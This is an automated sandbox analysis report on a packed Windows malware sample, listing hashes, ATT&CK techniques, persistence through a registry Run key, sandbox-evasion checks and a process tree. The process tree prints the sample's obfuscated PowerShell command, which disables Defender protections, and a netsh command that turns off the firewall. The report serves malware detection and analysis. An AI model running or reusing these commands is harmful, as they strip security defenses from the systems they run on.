cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2

General

Target

cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
Size

4.2MB
MD5

9c50d95dc3393f2f80cac58a9f5b93f7
SHA1

d33acac96477bfc8104e7ddb104992a7f2a41858
SHA256

cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2
SHA512

bb822cc965febd592066bc0c6ea93b026de40ec834374fed109bc4fd508fa33a6a1eb626f374f8be67229c1ce0dba3a4dfad2807618399f3a3470c014412c93f

Score

10^/10

evasion persistence suricata vmprotect

Malware Config

Signatures

suricata: ET MALWARE Generic .bin download from Dotted Quad
suricata: ET MALWARE Generic .bin download from Dotted Quad
suricata
Executes dropped EXE 1 IoCs

Processes:

EFC05FB45270538976416.exe

pid process

64 EFC05FB45270538976416.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
64	EFC05FB45270538976416.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/2680-121-0x00000000002E0000-0x0000000000997000-memory.dmp	vmprotect
C:\Users\Admin\Documents\EFC05FB45270538976416\EFC05FB45270538976416.exe	vmprotect
C:\Users\Admin\Documents\EFC05FB45270538976416\EFC05FB45270538976416.exe	vmprotect
behavioral1/memory/64-173-0x0000000001070000-0x0000000001727000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exeEFC05FB45270538976416.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EFC05FB45270538976416.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

EFC05FB45270538976416.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	EFC05FB45270538976416.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\EFC05FB45270538976416 = "C:\\Users\\Admin\\Documents\\EFC05FB45270538976416\\EFC05FB45270538976416.exe"	EFC05FB45270538976416.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3748 64 WerFault.exe EFC05FB45270538976416.exe

pid	pid_target	process	target process
3748	64	WerFault.exe	EFC05FB45270538976416.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exepowershell.exeEFC05FB45270538976416.exepowershell.exeWerFault.exe

pid	process
2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
1032	powershell.exe
1032	powershell.exe
1032	powershell.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
64	EFC05FB45270538976416.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe
3748	WerFault.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeRestorePrivilege	3748	WerFault.exe
Token: SeBackupPrivilege	3748	WerFault.exe
Token: SeDebugPrivilege	3748	WerFault.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.execmd.exepowershell.exeEFC05FB45270538976416.execmd.exepowershell.exe

description	pid	process	target process
PID 2680 wrote to memory of 3616	2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe	cmd.exe
PID 2680 wrote to memory of 3616	2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe	cmd.exe
PID 2680 wrote to memory of 3616	2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe	cmd.exe
PID 3616 wrote to memory of 516	3616	cmd.exe	powershell.exe
PID 3616 wrote to memory of 516	3616	cmd.exe	powershell.exe
PID 3616 wrote to memory of 516	3616	cmd.exe	powershell.exe
PID 2680 wrote to memory of 64	2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe	EFC05FB45270538976416.exe
PID 2680 wrote to memory of 64	2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe	EFC05FB45270538976416.exe
PID 2680 wrote to memory of 64	2680	cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe	EFC05FB45270538976416.exe
PID 516 wrote to memory of 1472	516	powershell.exe	netsh.exe
PID 516 wrote to memory of 1472	516	powershell.exe	netsh.exe
PID 516 wrote to memory of 1472	516	powershell.exe	netsh.exe
PID 64 wrote to memory of 2204	64	EFC05FB45270538976416.exe	cmd.exe
PID 64 wrote to memory of 2204	64	EFC05FB45270538976416.exe	cmd.exe
PID 64 wrote to memory of 2204	64	EFC05FB45270538976416.exe	cmd.exe
PID 2204 wrote to memory of 1032	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1032	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1032	2204	cmd.exe	powershell.exe
PID 1032 wrote to memory of 836	1032	powershell.exe	netsh.exe
PID 1032 wrote to memory of 836	1032	powershell.exe	netsh.exe
PID 1032 wrote to memory of 836	1032	powershell.exe	netsh.exe
PID 64 wrote to memory of 364	64	EFC05FB45270538976416.exe	notepad.exe
PID 64 wrote to memory of 364	64	EFC05FB45270538976416.exe	notepad.exe
PID 64 wrote to memory of 364	64	EFC05FB45270538976416.exe	notepad.exe

C:\Users\Admin\AppData\Local\Temp\cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe
"C:\Users\Admin\AppData\Local\Temp\cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2.exe"
1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEgAaQBnAGgAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYAIAAtAEYAbwByAGMAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2AA0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAANgANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwBlAHYAZQByAGUAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFMAYwBhAG4AUwBjAGgAZQBkAHUAbABlAEQAYQB5ACAAOAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAbgBlAHQAcwBoACAAYQBkAHYAZgBpAHIAZQB3AGEAbABsACAAcwBlAHQAIABhAGwAbABwAHIAbwBmAGkAbABlAHMAIABzAHQAYQB0AGUAIABvAGYAZgA=
2⤵
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEgAaQBnAGgAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYAIAAtAEYAbwByAGMAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2AA0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAANgANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwBlAHYAZQByAGUAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFMAYwBhAG4AUwBjAGgAZQBkAHUAbABlAEQAYQB5ACAAOAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAbgBlAHQAcwBoACAAYQBkAHYAZgBpAHIAZQB3AGEAbABsACAAcwBlAHQAIABhAGwAbABwAHIAbwBmAGkAbABlAHMAIABzAHQAYQB0AGUAIABvAGYAZgA=
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
4⤵
PID:1472

C:\Users\Admin\Documents\EFC05FB45270538976416\EFC05FB45270538976416.exe
"C:\Users\Admin\Documents\EFC05FB45270538976416\EFC05FB45270538976416.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:64

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEgAaQBnAGgAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYAIAAtAEYAbwByAGMAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2AA0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAANgANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwBlAHYAZQByAGUAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFMAYwBhAG4AUwBjAGgAZQBkAHUAbABlAEQAYQB5ACAAOAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAbgBlAHQAcwBoACAAYQBkAHYAZgBpAHIAZQB3AGEAbABsACAAcwBlAHQAIABhAGwAbABwAHIAbwBmAGkAbABlAHMAIABzAHQAYQB0AGUAIABvAGYAZgA=
3⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEgAaQBnAGgAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYAIAAtAEYAbwByAGMAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2AA0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAANgANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwBlAHYAZQByAGUAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYADQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFMAYwBhAG4AUwBjAGgAZQBkAHUAbABlAEQAYQB5ACAAOAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAbgBlAHQAcwBoACAAYQBkAHYAZgBpAHIAZQB3AGEAbABsACAAcwBlAHQAIABhAGwAbABwAHIAbwBmAGkAbABlAHMAIABzAHQAYQB0AGUAIABvAGYAZgA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:836

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
3⤵
PID:364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1232
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
88c8921207647e833d2d59251548e3bb

SHA1
915c1bee7108d3795469facbc9bcb4c96ef5a330

SHA256
0beb663e7bc2ccc98420d15bcfec0e46b81fe077280d425fa23f2a66b78d7e58

SHA512
20f6bc08b61d45aa07ba1f75c4809689eff75f2084aaa8de5156161fc6335d88c640460c2d22cd5f1c13bf5b49657182194ea5507dd72ed49c434cc05f626df7

Download Submit
C:\Users\Admin\Documents\EFC05FB45270538976416\EFC05FB45270538976416.exe
MD5
9c50d95dc3393f2f80cac58a9f5b93f7

SHA1
d33acac96477bfc8104e7ddb104992a7f2a41858

SHA256
cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2

SHA512
bb822cc965febd592066bc0c6ea93b026de40ec834374fed109bc4fd508fa33a6a1eb626f374f8be67229c1ce0dba3a4dfad2807618399f3a3470c014412c93f

Download Submit
C:\Users\Admin\Documents\EFC05FB45270538976416\EFC05FB45270538976416.exe
MD5
9c50d95dc3393f2f80cac58a9f5b93f7

SHA1
d33acac96477bfc8104e7ddb104992a7f2a41858

SHA256
cd98fd36bb86c766619a6b37fa1c1cadd828c76789730f65a84360b20d14ccf2

SHA512
bb822cc965febd592066bc0c6ea93b026de40ec834374fed109bc4fd508fa33a6a1eb626f374f8be67229c1ce0dba3a4dfad2807618399f3a3470c014412c93f

Download Submit
memory/64-169-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

Filesize
4KB

Download
memory/64-173-0x0000000001070000-0x0000000001727000-memory.dmp

Filesize
6.7MB

Download
memory/64-162-0x0000000000000000-mapping.dmp

Download
memory/64-172-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

Filesize
4KB

Download
memory/64-171-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/64-168-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

Filesize
4KB

Download
memory/64-167-0x0000000000930000-0x0000000000931000-memory.dmp

Filesize
4KB

Download
memory/64-166-0x0000000000910000-0x0000000000911000-memory.dmp

Filesize
4KB

Download
memory/64-233-0x000000007FBF0000-0x000000007FBF9000-memory.dmp

Filesize
36KB

Download
memory/364-747-0x0000000000000000-mapping.dmp

Download
memory/516-130-0x0000000004D40000-0x0000000004D41000-memory.dmp

Filesize
4KB

Download
memory/516-128-0x00000000033A0000-0x00000000033A1000-memory.dmp

Filesize
4KB

Download
memory/516-133-0x0000000007970000-0x0000000007971000-memory.dmp

Filesize
4KB

Download
memory/516-134-0x00000000076D0000-0x00000000076D1000-memory.dmp

Filesize
4KB

Download
memory/516-135-0x0000000007870000-0x0000000007871000-memory.dmp

Filesize
4KB

Download
memory/516-136-0x00000000078E0000-0x00000000078E1000-memory.dmp

Filesize
4KB

Download
memory/516-137-0x0000000008180000-0x0000000008181000-memory.dmp

Filesize
4KB

Download
memory/516-138-0x0000000008010000-0x0000000008011000-memory.dmp

Filesize
4KB

Download
memory/516-139-0x0000000008AD0000-0x0000000008AD1000-memory.dmp

Filesize
4KB

Download
memory/516-140-0x0000000008870000-0x0000000008871000-memory.dmp

Filesize
4KB

Download
memory/516-141-0x00000000033A0000-0x00000000033A1000-memory.dmp

Filesize
4KB

Download
memory/516-174-0x0000000009B50000-0x0000000009B51000-memory.dmp

Filesize
4KB

Download
memory/516-149-0x0000000009620000-0x0000000009653000-memory.dmp

Filesize
204KB

Download
memory/516-151-0x000000007F5A0000-0x000000007F5A1000-memory.dmp

Filesize
4KB

Download
memory/516-157-0x0000000009600000-0x0000000009601000-memory.dmp

Filesize
4KB

Download
memory/516-132-0x00000000052F2000-0x00000000052F3000-memory.dmp

Filesize
4KB

Download
memory/516-163-0x0000000009980000-0x0000000009981000-memory.dmp

Filesize
4KB

Download
memory/516-170-0x00000000052F3000-0x00000000052F4000-memory.dmp

Filesize
4KB

Download
memory/516-129-0x00000000033A0000-0x00000000033A1000-memory.dmp

Filesize
4KB

Download
memory/516-131-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/516-127-0x0000000000000000-mapping.dmp

Download
memory/836-737-0x0000000000000000-mapping.dmp

Download
memory/1032-548-0x0000000000DD3000-0x0000000000DD4000-memory.dmp

Filesize
4KB

Download
memory/1032-547-0x000000007ED70000-0x000000007ED71000-memory.dmp

Filesize
4KB

Download
memory/1032-456-0x0000000000DD2000-0x0000000000DD3000-memory.dmp

Filesize
4KB

Download
memory/1032-455-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

Filesize
4KB

Download
memory/1032-442-0x0000000000000000-mapping.dmp

Download
memory/1472-434-0x0000000000000000-mapping.dmp

Download
memory/2204-440-0x0000000000000000-mapping.dmp

Download
memory/2680-121-0x00000000002E0000-0x0000000000997000-memory.dmp

Filesize
6.7MB

Download
memory/2680-119-0x00000000029F0000-0x00000000029F1000-memory.dmp

Filesize
4KB

Download
memory/2680-120-0x0000000002A00000-0x0000000002A01000-memory.dmp

Filesize
4KB

Download
memory/2680-118-0x00000000029E0000-0x00000000029E1000-memory.dmp

Filesize
4KB

Download
memory/2680-117-0x00000000029D0000-0x00000000029D1000-memory.dmp

Filesize
4KB

Download
memory/2680-143-0x00000000772E0000-0x000000007746E000-memory.dmp

Filesize
1.6MB

Download
memory/2680-124-0x000000007FC90000-0x000000007FC99000-memory.dmp

Filesize
36KB

Download
memory/2680-115-0x0000000000F90000-0x0000000000F91000-memory.dmp

Filesize
4KB

Download
memory/2680-126-0x00000000772E0000-0x000000007746E000-memory.dmp

Filesize
1.6MB

Download
memory/2680-116-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

Filesize
4KB

Download
memory/3616-125-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads